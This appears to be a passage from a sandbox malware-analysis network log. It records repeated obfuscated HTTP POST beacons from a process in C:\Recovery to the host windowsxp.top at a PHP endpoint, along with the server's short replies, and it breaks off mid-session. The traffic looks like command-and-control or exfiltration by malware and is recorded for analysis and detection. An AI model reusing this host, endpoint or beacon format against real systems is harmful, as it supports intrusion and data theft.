                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1115&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1306859&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  45192.168.2.449909188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:22.656532049 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:23.023518085 CET1012OUTData Raw: 50 57 5d 58 5e 5c 56 56 54 58 57 54 54 56 5b 5f 59 58 5b 5a 52 51 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PW]X^\VVTXWTTV[_YX[ZRQRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%# 9%!<Z.$407->8*"",=7_)).?!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:23.260824919 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:23.475785971 CET774INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ne4RxCFWfNIdFkpUCsX4Y4K%2BsWESg%2F%2BNKeikjWNFGerK3rN14jOUWRHHtgo3pXVba5xStOLVE3zdo89ZT1AZtUSi9V71dxZ3%2FgmmpXdgmd0hgPYYCfKFbqWsPJFIvIpv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b789fecfe96a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1061&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1328440&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  46192.168.2.449915188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:23.620448112 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:23.977475882 CET1012OUTData Raw: 55 5a 5d 5f 5b 5f 53 55 54 58 57 54 54 50 5b 5d 59 5d 5b 5a 52 5e 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZ]_[_SUTXWTTP[]Y][ZR^RYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']%X _"*1589$(^$8-= ><7#"Z--;^?,9?!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:24.221551895 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:24.533438921 CET767INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MM4YTCk%2BkqgiuETLKrTRJ6iv2OSkcMqRXqHxqLeTqzvhDr0zPonmskIHxinGxcIE2VD2lIILjWS%2FwoheRmK55Tr0mLxn0yH9WAvN%2F4v2sK%2BndWpYBAnHWwXbQMUNW2bW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b78fea6ae7cb-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2100&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=708414&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:24.533529997 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  47192.168.2.449921188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:24.674752951 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:25.024260998 CET1012OUTData Raw: 55 57 5d 5f 5b 5b 56 50 54 58 57 54 54 5c 5b 52 59 5a 5b 59 52 5e 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UW]_[[VPTXWTT\[RYZ[YR^R\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'2/65X#%<]-'?0+;;;(<+4T3Y8.+*_-!Y##X(
                                                                                                                  Oct 27, 2024 19:23:25.284326077 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:25.595818996 CET775INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJir1ZB8i573%2FMqw38ijkY3V4dVTqElYjKUw1hX82kdUMWgMByksxfnm%2B1tpel%2FpGYL07dV%2FX0ARWyJGnjzHC2696I3drj%2F9UIvUhrnpVNId1VnmUYxzl7qQXrPl6jDo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b796a96f4864-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1591&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=872289&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  48192.168.2.449931188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:25.736021996 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:26.086759090 CET1012OUTData Raw: 55 57 58 54 5e 59 56 5e 54 58 57 54 54 51 5b 5e 59 59 5b 58 52 51 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UWXT^YV^TXWTTQ[^YY[XRQRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']&./"!(_-438(V;W>$V"!$;[<)%-/!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:26.350963116 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:26.677417994 CET768INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TRL8XDdKJXH52r2aH%2FHKczgh4hooTSVxuheJqlOE9c7qfouKQV27G7RID0PkQ4891K2w9MFJOIkbYAZaYZjIzbKBd16a7IayWQLmzFdusp4oveFuMORfD5xG7qsCLnZJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b79d4c706b79-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1195706&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  49192.168.2.449936188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:26.551053047 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:26.982070923 CET1716OUTData Raw: 50 52 58 54 5b 5c 56 53 54 58 57 54 54 53 5b 53 59 51 5b 51 52 55 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PRXT[\VSTXWTTS[SYQ[QRUR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1X 6:#&8\.?$/=$>?4V71?;$>/>9?!Y##X(;
                                                                                                                  Oct 27, 2024 19:23:27.147943020 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:27.454665899 CET929INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mw3S1PP%2FUuep5vdhjBMxpVfqDC22A7%2FbQrlgssc5M4%2Bp7Va7r%2FYbRHVLfeKUmd90XQlnyLY73cpbR%2B5MhIFTO%2FaIhKIkwXSmbU%2FWCiZZDBaaXvmn0ieSHCfO9GB5WMUu"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7a248d63aa9-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1226079&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5d 23 3e 30 57 2a 2f 36 08 3d 08 21 10 33 3c 32 00 2e 22 05 01 3e 04 21 55 3a 38 3a 51 33 1a 21 43 3c 2a 3c 59 22 3e 30 56 2a 0f 21 5e 00 1c 27 5c 35 3e 39 50 25 05 38 19 33 09 20 16 36 2e 2b 59 3d 07 3d 57 2b 00 38 5f 3f 06 01 19 3b 11 0c 09 26 07 3e 11 3b 38 26 58 2b 00 2a 54 0c 14 22 01 2d 11 3c 5b 35 08 3a 0f 29 22 28 5a 27 2e 33 08 27 3a 0d 0b 3c 2c 34 00 3c 2e 21 5c 21 05 3c 1f 2b 16 39 02 33 3e 27 1e 3e 04 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"]#>0W*/6=!3<2.">!U:8:Q3!C<*<Y">0V*!^'\5>9P%83 6.+Y==W+8_?;&>;8&X+*T"-<[5:)"(Z'.3':<,4<.!\!<+93>'>"T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  50192.168.2.449939188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:27.183696985 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:27.539858103 CET1012OUTData Raw: 50 57 58 5c 5b 5c 56 50 54 58 57 54 54 50 5b 5d 59 5f 5b 51 52 57 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWX\[\VPTXWTTP[]Y_[QRWRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY''. **"?,40%+ W;/=<$Q Z->+[?,.9?!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:27.785991907 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:28.388420105 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fj7iCPt9%2FaWzsVji%2FWeDIwardxKLg5Mp0dkPczPbU3lumwk%2F9FZGDnyfUO47gWfjEApRx%2FlpNRoaH4Q0Smbi%2BP633ie9UWaxUeZiecgZUvyn34Zn7OI3qND7QzmTByqg"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7a64e6e6bfb-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1061&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1400386&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0
                                                                                                                  Oct 27, 2024 19:23:28.389286995 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fj7iCPt9%2FaWzsVji%2FWeDIwardxKLg5Mp0dkPczPbU3lumwk%2F9FZGDnyfUO47gWfjEApRx%2FlpNRoaH4Q0Smbi%2BP633ie9UWaxUeZiecgZUvyn34Zn7OI3qND7QzmTByqg"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7a64e6e6bfb-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1061&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1400386&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  51192.168.2.449948188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:28.756151915 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:29.102458954 CET1012OUTData Raw: 50 50 58 54 5e 5c 56 57 54 58 57 54 54 56 5b 59 59 59 5b 51 52 54 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXT^\VWTXWTTV[YYY[QRTRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$20Z"!4-' \38,><U*?77! 8_><--/!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:29.360512972 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:29.762352943 CET775INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:29 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSHpVh5k0xRcj34Amn7rE4mhMKgxrOBsLtebyfiX01lI%2BZRmv%2BP%2Bq5mul2szEpASG7N7nuhfQud%2Fa2J9iVMn3WVUPgEr%2FBz1TpLnCuPidR3mozQ%2BCt%2FtmAzUhBREqPCO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7b0187d6c7f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1434&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1191769&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:29.762517929 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0
                                                                                                                  Oct 27, 2024 19:23:29.762656927 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  52192.168.2.449954188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:29.902301073 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:30.264959097 CET1008OUTData Raw: 55 53 58 54 5e 52 53 55 54 58 57 54 54 55 5b 5f 59 58 5b 59 52 50 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: USXT^RSUTXWTTU[_YX[YRPRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z%.^ *66% -<%+$,.#*,4#"38.?Z>%9?!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:30.500969887 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:30.802417040 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hkuu2KeH6qerLdxxS7PE7IjIHyDaATvdGAGZiRckqsLo6KJH%2FC59ti657EY6Tungd7jnHT%2FK3MQByaktO5%2Fhp2Fazj%2FsL39Unrlsd7hBFiY%2BZPAKSJft9o1fhzFWpoif"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7b74c816c6f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1236549&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  53192.168.2.449961188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:30.935734987 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:31.290782928 CET1012OUTData Raw: 50 51 5d 59 5b 5f 56 52 54 58 57 54 54 5c 5b 58 59 51 5b 5a 52 52 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
